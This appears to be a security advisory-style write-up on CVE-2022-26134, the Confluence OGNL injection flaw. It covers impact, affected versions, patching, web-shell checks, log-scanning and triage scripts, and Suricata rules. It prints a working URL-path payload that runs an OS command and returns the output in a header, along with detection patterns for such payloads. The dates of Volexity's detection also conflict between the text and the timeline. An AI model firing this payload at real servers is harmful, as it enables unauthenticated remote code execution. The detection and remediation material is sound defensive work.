Background
Atlassian Confluence is an enterprise collaboration platform serving as the central knowledge management and documentation hub for many organisations. Confluence instances frequently contain sensitive internal documentation, architecture diagrams, credentials, meeting notes, and project data. Its ubiquity in enterprise environments and the sensitive nature of its content make it a prime target.
CVE-2022-26134 is a critical OGNL (Object-Graph Navigation Language) injection vulnerability in Confluence Server and Data Center, disclosed on June 2, 2022. It was exploited as a zero-day beginning approximately one week before Atlassian’s advisory, with Volexity detecting exploitation during an active incident response engagement. The vulnerability allows unauthenticated attackers to execute arbitrary code via the OGNL expression language that Confluence uses for template rendering and URL-based operations.
Technical Mechanism
OGNL (Object-Graph Navigation Language) is an expression language used in Java applications to navigate and manipulate object graphs. Confluence uses OGNL for various features including template processing and URL parameter evaluation.
CVE-2022-26134 is in Confluence’s URL processing layer. Confluence’s routing configuration uses OGNL expressions in certain URL patterns. The vulnerability allows OGNL expressions to be injected through the HTTP request URI and evaluated server-side without authentication:
# Base exploit pattern
GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28new+String%5B%5D%7B%22id%22%7D%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1
# Decoded OGNL expression:
${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(new String[]{"id"}).getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
The exploit works by:
- Injecting an OGNL expression in the URL path (URL-encoded)
- Confluence’s URL router evaluates the path and processes OGNL expressions
- The expression calls Runtime.getRuntime().exec() to execute OS commands
- Output is returned via a custom HTTP response header
The Java expression provides access to the full Java runtime, allowing execution of arbitrary commands in the context of the Confluence application server (typically Apache Tomcat), running as the Confluence service account.
This vulnerability is similar to CVE-2021-26084 (another Confluence OGNL injection) and is part of a pattern of OGNL injection vulnerabilities in Java applications that use expression languages for template processing.
Real-World Exploitation Evidence
Volexity detected active exploitation during an incident response engagement on June 2, 2022 — the same day Atlassian published its advisory. The timeline indicates exploitation was already occurring before or simultaneously with disclosure:
- Immediate mass exploitation: Within 24 hours of the advisory, multiple security firms reported widespread exploitation attempts against internet-facing Confluence instances.
- Web shell deployment: The most common immediate post-exploitation action was deploying web shells (.jsp files in the Confluence web root) for persistent access.
- Chopper web shell: A China Chopper web shell variant was frequently deployed, consistent with Chinese threat actor tradecraft.
- PoC proliferation: Multiple working PoC exploits were published within hours of the advisory, lowering the technical barrier for exploitation.
- Cryptocurrency miner deployment: Beyond advanced threat actors, opportunistic actors deployed Monero cryptocurrency miners on compromised servers.
- Ransomware staging: Evidence of Confluence compromises used as initial access for later ransomware deployment.
CISA issued an urgent advisory recommending blocking internet access to Confluence as an immediate mitigation.
Impact Assessment
Unauthenticated RCE on Confluence provides:
- Code execution in application context: Java process execution with Confluence service account permissions.
- Complete Confluence content access: All Confluence spaces, pages, attachments, and macro content — including credentials that users have stored in Confluence pages (a common but insecure practice).
- Database access: Confluence’s database connection credentials are in the application’s configuration; RCE provides access to the underlying Confluence database.
- Internal network pivot: Confluence servers typically have connectivity to other internal systems; the compromised server serves as a pivot point.
- Plugin-based escalation: Confluence plugins execute Java code in the application’s JVM; installing a malicious plugin via the compromised admin access provides persistent elevated RCE.
Affected Versions
| Product | Affected Versions | Fixed Version |
|---|---|---|
| Confluence Server | 1.3.0 – 7.18.0 | 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1 |
| Confluence Data Center | 1.3.0 – 7.18.0 | Same as above |
| Confluence Cloud | Not affected | N/A |
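As an added example (not code from Atlassian or the original page), a small triage helper that encodes the table above for an asset inventory: a Server/Data Center version is treated as vulnerable when it falls within 1.3.0 to 7.18.0 and is below the listed fix for its branch; branches with no listed fix are treated as unpatched, which is the conservative reading of the table.

```python
import re

# Affected range and fixed builds taken from the Affected Versions table above.
AFFECTED_MIN = (1, 3, 0)
AFFECTED_MAX = (7, 18, 0)
FIXED_VERSIONS = ["7.4.17", "7.13.7", "7.14.3", "7.15.2", "7.16.4", "7.17.4", "7.18.1"]


def parse_version(s):
    """'7.13.6' -> (7, 13, 6); a missing patch component is read as 0."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", s.strip())
    if not m:
        raise ValueError(f"unparseable Confluence version: {s!r}")
    return tuple(int(p or 0) for p in m.groups())


def is_vulnerable(version):
    """True when the version is inside the affected range and has not reached
    the fix level of its major.minor branch (e.g. 7.13.6 yes, 7.13.7 and 7.13.8 no,
    7.12.x yes because no 7.12 fix is listed, 7.18.1 no)."""
    v = parse_version(version)
    if not (AFFECTED_MIN <= v <= AFFECTED_MAX):
        return False  # outside 1.3.0 - 7.18.0 (e.g. 7.18.1 or newer)
    for fixed in map(parse_version, FIXED_VERSIONS):
        if v[:2] == fixed[:2] and v >= fixed:
            return False  # same branch, at or above the fixed build
    return True


def triage(inventory):
    """inventory: {hostname: version string}. Returns hosts still needing the patch."""
    return sorted(host for host, ver in inventory.items() if is_vulnerable(ver))


if __name__ == "__main__":
    # Constructed inventory for illustration only.
    sample = {"wiki-prod": "7.13.6", "wiki-dr": "7.13.8", "wiki-legacy": "7.12.5", "wiki-new": "7.18.1"}
    print("needs patching:", triage(sample))
```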
Remediation Steps
- Apply patches immediately: Update to a fixed version. Multiple fix versions were released to cover different supported branches.
- Emergency mitigation — restrict internet access: CISA recommended immediately restricting internet access to Confluence as an interim measure:
  - Block all inbound HTTP/HTTPS to Confluence from untrusted networks
  - Place behind VPN or require VPN for access
- Check for web shell compromise: Scan for unexpected JSP files:
  find <confluence-install>/confluence/ -name "*.jsp" -newer <confluence-install>/confluence/WEB-INF/web.xml
- Review Confluence logs: Check atlassian-confluence.log and the access log for OGNL expressions in URL paths (look for %24%7B or ${).
- Post-patch user audit: Review all Confluence user accounts and administrator accounts for unexpected additions.
Detection Guidance
Log sources:
- Confluence access log: <confluence-install>/logs/localhost_access_log.*.txt
- Confluence application log: <confluence-home>/logs/atlassian-confluence.log
Detection pattern in access logs:
# URL-encoded OGNL injection
%24%7B in URL path
%40java.lang.Runtime
%40org.apache.commons
# Decoded OGNL patterns
${@java.lang.Runtime
${(#
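An added example (not from the original page) that applies the patterns above to access-log lines: it extracts the request URI, percent-decodes it repeatedly so double-encoded payloads are not missed, and reports the strongest indicator per line. The log lines are constructed samples in Tomcat access-log format, not real traffic.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (not real traffic). The first two carry OGNL in the
# path (the second one is double-encoded); the remaining two are benign requests.
SAMPLE_ACCESS_LOG = """\
203.0.113.10 - - [02/Jun/2022:10:15:01 +0000] "GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29%7D/ HTTP/1.1" 302 0
203.0.113.11 - - [02/Jun/2022:10:16:07 +0000] "GET /%2524%257B%2540java.lang.Runtime%2540getRuntime%2528%2529%257D/ HTTP/1.1" 302 0
198.51.100.5 - - [02/Jun/2022:10:17:22 +0000] "GET /display/ENG/Architecture+Overview HTTP/1.1" 200 18231
198.51.100.6 - - [02/Jun/2022:10:18:40 +0000] "POST /rest/api/content?expand=body.storage HTTP/1.1" 200 5120
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')

# Indicators from the detection patterns above, applied after decoding; listed by confidence.
OGNL_INDICATORS = [
    ("ognl_context_var", re.compile(r"\$\{\s*\(?\s*#")),            # ${(#  or  ${#
    ("runtime_ref",      re.compile(r"@java\.lang\.Runtime", re.I)),
    ("commons_io_ref",   re.compile(r"@org\.apache\.commons", re.I)),
    ("bare_expression",  re.compile(r"\$\{")),                      # any ${ in a Confluence path
]


def fully_decode(uri, max_rounds=5):
    """Percent-decode until the string stops changing, so %2524 -> %24 -> $ is caught."""
    for _ in range(max_rounds):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri


def scan_access_log(text):
    """Return (line_no, client_ip, decoded_uri, indicator_name) for each suspicious request."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        decoded = fully_decode(m.group("uri"))
        for name, pat in OGNL_INDICATORS:
            if pat.search(decoded):
                hits.append((n, line.split()[0], decoded, name))
                break  # keep only the highest-confidence indicator per line
    return hits


if __name__ == "__main__":
    for n, ip, uri, name in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"line {n}: {ip} [{name}] {uri}")
```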
Suricata signatures:
# Note: Suricata's http.uri buffer is normalized (percent-decoded), so encoded sequences such as %24%7B must be matched against http.uri.raw; the decoded class name is matched in http.uri.
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"Atlassian Confluence CVE-2022-26134 OGNL Injection"; flow:established,to_server; http.uri.raw; content:"%24%7B"; http.uri; content:"java.lang.Runtime"; nocase; sid:9002261; rev:1;)
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"Atlassian Confluence CVE-2022-26134 OGNL Injection v2"; flow:established,to_server; http.uri.raw; pcre:"/%24%7B.*exec\(/i"; sid:9002262; rev:1;)
Timeline
| Date | Event |
|---|---|
| May 25, 2022 | Earliest known exploitation (Volexity) |
| June 2, 2022 | Atlassian publishes advisory; patches released |
| June 2, 2022 | CISA adds CVE-2022-26134 to KEV catalogue |
| June 3, 2022 | CISA issues urgent advisory recommending immediate mitigation |
| June 3, 2022 | Multiple PoC exploits published publicly |
| June 2022 | Mass exploitation wave; web shell deployments across thousands of instances |